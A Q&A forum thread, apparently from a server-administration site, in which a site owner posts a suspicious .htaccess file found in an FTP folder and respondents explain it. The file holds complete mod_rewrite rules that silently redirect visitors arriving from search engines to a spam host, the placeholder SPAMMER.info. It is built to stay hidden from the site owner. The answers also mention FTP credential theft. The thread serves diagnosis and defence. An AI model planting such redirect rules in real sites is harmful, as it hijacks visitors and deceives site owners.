# Suspicious .htaccess File

Tags: apache-2.2, security, mod-rewrite, .htaccess

This was uploaded to one of my FTP folders. I'm not familiar with Apache, but still curious - can someone tell me what type of dastardly act this file is trying to commit? Thanks!

```
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
```

Comment: NICE! (In an evil sort of way...)  Is basically taking everyone who's coming to your site from a search engine and redirecting them to SPAMMER.info

Comment: Had this happen to me once. The `.htaccess` file added to my site had about 40 blank lines at the top, just to confuse me further.

Answer (score 15, accepted):

That sends users that come from a search engine to the last site `SPAMMER.info` (see question history for *actual* site).

It looks for referrers in an attempt to hide from *you*, since you likely don't access the site via search engines. That is, if you go to the URL directly, everything seems normal. However, if you come in via a search engine, you get redirected.

Note: this **does not** affect web crawlers as they ([googlebot, at least](http://www.webmasterworld.com/google/3109275.htm)) don't set the referrer header.

Answer (score 8):

Any time a user from a search engine any page on your site, they'll be redirected to .info spam site.

It's very sneaky - you won't notice anything is wrong as you'll normally just type the address in.

Comment: Since it's looking at the referrer, won't it redirect any clicks that come through a search engine?

Comment: Doesn't it affect links from Google as well?  E.g., you search for the OP's site on Google, click on it and you're redirected since you come from Google?

Comment: Yes, Links from search engines only (as I said in my answer) but *not* search engine crawlers/bots. This answer has been updated so it is now correct. It originally indicated that this applied to bots only.

Answer (score 1):

to add more - most probably your ftp credentials got leaked. maybe you had them saved in filezilla / total commander etc. there is plenty of malware stealing those and then 'going' around - logging on to ftp accounts, attaching malicious javascript to index.php / html or putting similar rewrite files.

Comment: I am facing this issue. Day after other .htaccess file get modified which result in internal server error.